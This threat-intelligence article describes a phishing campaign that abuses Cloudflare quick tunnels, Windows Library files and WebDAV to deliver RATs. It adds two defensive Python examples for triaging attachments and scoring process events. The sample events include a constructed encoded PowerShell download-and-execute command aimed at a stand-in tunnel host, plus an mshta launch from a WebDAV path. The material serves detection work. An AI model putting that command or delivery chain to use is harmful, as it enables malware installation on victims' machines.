As cybercriminals increasingly turn to sophisticated tactics, the abuse of Cloudflare's free TryCloudflare Tunnel feature, which lets anyone expose a local web server on a throwaway *.trycloudflare.com subdomain without holding a Cloudflare account, has emerged as a significant threat. Attackers host their staging infrastructure behind such a tunnel and drive victims to it with phishing emails disguised as legitimate invoices or tax documents. The attachments use file types that email filters tend to treat as low-risk, such as Windows Library files (MIME type "application/windows-library+xml", extension .library-ms), whose XML can point Explorer at a remote WebDAV share. Detection rules for these lures have been written, but the attackers keep adjusting the chain, so their effectiveness is continually challenged.
Payload execution starts with a deceptive LNK file, typically reached through the WebDAV share, which launches an HTML Application (HTA) containing VBScript. By connecting to WebDAV resources hosted behind Cloudflare's infrastructure, the attackers stage multi-step payloads whose end goal is a Remote Access Trojan (RAT); families observed include AsyncRAT and Remcos, alongside the GuLoader downloader. Later stages run in memory rather than being written to disk, leaving little for file-based detection to find. Researchers track this still-active campaign as Serpentine#Cloud.
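To make concrete what a "low-risk" Windows Library attachment actually carries, here is an added example (not code from the original article, and not from any vendor's tooling) that parses a .library-ms file and flags any location pointing at a remote WebDAV share, with a specific callout for *.trycloudflare.com hosts. The sample library, its hostname and the `classify_location`/`inspect_library` helpers are constructed for this example.

```python
"""Triage a Windows Library (.library-ms) attachment before anyone opens it.

A .library-ms file is a short XML document. When opened, Explorer browses every
<url> it lists, so a library pointing at an attacker's WebDAV share renders the
remote folder (and the LNK inside it) as if it were local.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlsplit

# UNC syntax Windows uses for WebDAV over HTTPS:
#   \\host@SSL\DavWWWRoot\folder   or   \\host@SSL@443\folder
UNC_RE = re.compile(
    r"^\\\\(?P<host>[^\\@]+)(?P<ssl>@SSL)?(?:@(?P<port>\d+))?(?:\\(?P<path>.*))?$",
    re.IGNORECASE,
)
# Cloudflare hands these out to anyone running `cloudflared tunnel --url ...`,
# no account required, so they are disposable and carry no reputation.
QUICK_TUNNEL_SUFFIXES = (".trycloudflare.com",)


@dataclass
class Location:
    raw: str
    kind: str                 # "local", "unc", "webdav-unc", "http" or "unknown"
    host: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def classify_location(raw: str) -> Location:
    """Decide whether one <url> value is local or points at a remote (WebDAV) host."""
    value = raw.strip()
    lower = value.lower()
    if lower.startswith("knownfolder:") or re.match(r"^[a-z]:\\", lower):
        return Location(value, "local", None)

    reasons: List[str] = []
    m = UNC_RE.match(value)
    if m:
        host = m.group("host").lower()
        path = (m.group("path") or "").lower()
        kind = "unc"
        if m.group("ssl") or "davwwwroot" in path:
            kind = "webdav-unc"
            reasons.append("WebDAV-over-HTTPS UNC syntax (@SSL / DavWWWRoot)")
    elif lower.startswith(("http://", "https://")):
        host = (urlsplit(value).hostname or "").lower()
        kind = "http"
        reasons.append("library backed by an HTTP(S) WebDAV server")
    else:
        return Location(value, "unknown", None, ["unrecognised location syntax"])

    if host.endswith(QUICK_TUNNEL_SUFFIXES):
        reasons.append("host is a Cloudflare quick tunnel (*.trycloudflare.com)")
    return Location(value, kind, host, reasons)


def extract_urls(xml_bytes: bytes) -> List[str]:
    """Return every <url> text in the library, ignoring XML namespaces."""
    # For mail-borne files prefer defusedxml here; the stdlib parser is used
    # only to keep this example dependency-free.
    root = ET.fromstring(xml_bytes)
    return [el.text for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "url" and el.text]


def inspect_library(xml_bytes: bytes) -> List[Location]:
    return [classify_location(u) for u in extract_urls(xml_bytes)]


# Constructed sample: the shape of a real library file, with a made-up tunnel host.
SAMPLE_LIBRARY = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\invoice-example.trycloudflare.com@SSL\DavWWWRoot\docs</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    for loc in inspect_library(SAMPLE_LIBRARY):
        flag = "SUSPICIOUS" if loc.suspicious else "ok"
        print(f"{flag:10} {loc.kind:10} {loc.host or '-':40} {'; '.join(loc.reasons)}")
```

A legitimate library points at known folders (`knownfolder:{GUID}`) or local drives; one that references any `@SSL` UNC path or an HTTP(S) server is worth quarantining on its own, and a quick-tunnel host makes the verdict unambiguous. Run this over attachments at the mail gateway, before the file ever reaches Explorer.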
Organizations in the manufacturing, technology, finance, and legal sectors are the most frequent targets. All of these industries routinely process invoices and tax documents, which both points to a financial motive and makes the lures plausible to their recipients. Cybercriminals have reportedly sent more than 1,500 phishing messages across these industries, so that even a low click rate yields a steady stream of compromised hosts. Given how often social engineering features in successful intrusions (by one estimate, 98% of cyberattacks involve it), these phishing campaigns prove particularly effective at compromising organizational security.
The use of Cloudflare tunnel subdomains also lends the infrastructure a veneer of legitimacy: traffic goes to a well-known CDN over HTTPS, and the subdomain is disposable, so blocklisting individual hosts achieves little. Obfuscated batch (BAT) and PowerShell scripts hide the malicious actions, which blunts signature-based detection; the behaviours around the scripts, such as a script host launched from a WebDAV path or a trycloudflare.com host appearing in a process command line, are harder for the attacker to avoid. As evasion techniques develop, even machine learning-based detection capabilities struggle to keep pace with the evolving threat environment.
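Because the BAT and PowerShell layers are obfuscated, a practical detection keys on behaviour rather than script content. The following added example (not from the original article or any vendor product) scores constructed Sysmon-style process-creation events for a *.trycloudflare.com host on the command line, a WebDAV-over-HTTPS UNC path, a script host started by explorer.exe from such a path, and PowerShell launched with -EncodedCommand, which it decodes so the hidden command can be inspected. The event records, hostnames, paths and the `score_event`/`hunt` helpers are all made up for the example.

```python
"""Score process-creation events for the TryCloudflare/WebDAV delivery chain.

Signatures on obfuscated .bat/.ps1 content are brittle; the behaviours around
them are not. Each event is normalised and checked for a quick-tunnel host, a
WebDAV-over-HTTPS UNC path, a script host spawned by explorer.exe from such a
path, and PowerShell started with an encoded command.
"""
import base64
import re
from typing import Dict, List, Optional

QUICK_TUNNEL_RE = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.IGNORECASE)
# \\host@SSL\... or \\host@SSL@443\... is how Windows reaches WebDAV over HTTPS.
WEBDAV_UNC_RE = re.compile(r"\\\\[^\\\s]+@SSL(?:@\d+)?\\", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the usual ones.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)
DOWNLOAD_OR_EVAL_RE = re.compile(r"\b(iex|invoke-expression|downloadstring|frombase64string)\b",
                                 re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe",
                "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe"}


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the suspicious behaviours seen in one event (empty list if benign)."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_powershell(cmd)
    # Scan the decoded payload too: the tunnel host often appears only there.
    visible = cmd if decoded is None else f"{cmd} {decoded}"
    hits: List[str] = []

    for host in dict.fromkeys(h.lower() for h in QUICK_TUNNEL_RE.findall(visible)):
        hits.append(f"references Cloudflare quick tunnel host {host}")
    remote_path = bool(WEBDAV_UNC_RE.search(cmd))
    if remote_path:
        hits.append("WebDAV-over-HTTPS UNC path on command line")
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and (remote_path or QUICK_TUNNEL_RE.search(cmd)):
        hits.append(f"explorer.exe launched {image} from a remote location (LNK/HTA style)")
    if decoded is not None:
        hits.append("PowerShell -EncodedCommand decodes to: " + decoded.strip())
        if DOWNLOAD_OR_EVAL_RE.search(decoded):
            hits.append("decoded command downloads or evaluates further code")
    return hits


def hunt(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (image name, hits) for every event that scored at least one hit."""
    results = []
    for ev in events:
        hits = score_event(ev)
        if hits:
            results.append((ev["Image"].rsplit("\\", 1)[-1].lower(), hits))
    return results


def encode_powershell(ps: str) -> str:
    """Encode a command the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon Event ID 1 style events; hostnames, users and paths are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe \\invoice-example.trycloudflare.com@SSL\DavWWWRoot\docs\invoice.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('https://invoice-example.trycloudflare.com/stage2')")},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Q2-report.docx"'},
]

if __name__ == "__main__":
    for image, hits in hunt(SAMPLE_EVENTS):
        print(image)
        for h in hits:
            print("   -", h)
```

Each of these checks is something a Sigma rule or EDR query can express directly; the point of decoding `-EncodedCommand` on the fly is that the indicator the attacker most wants to hide (the tunnel hostname) is usually right there once the base64 and UTF-16LE layers are peeled off.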
Since these tactics were first observed in February 2024, the campaigns have continued, demonstrating troubling persistence and adaptability on the part of the actors behind them.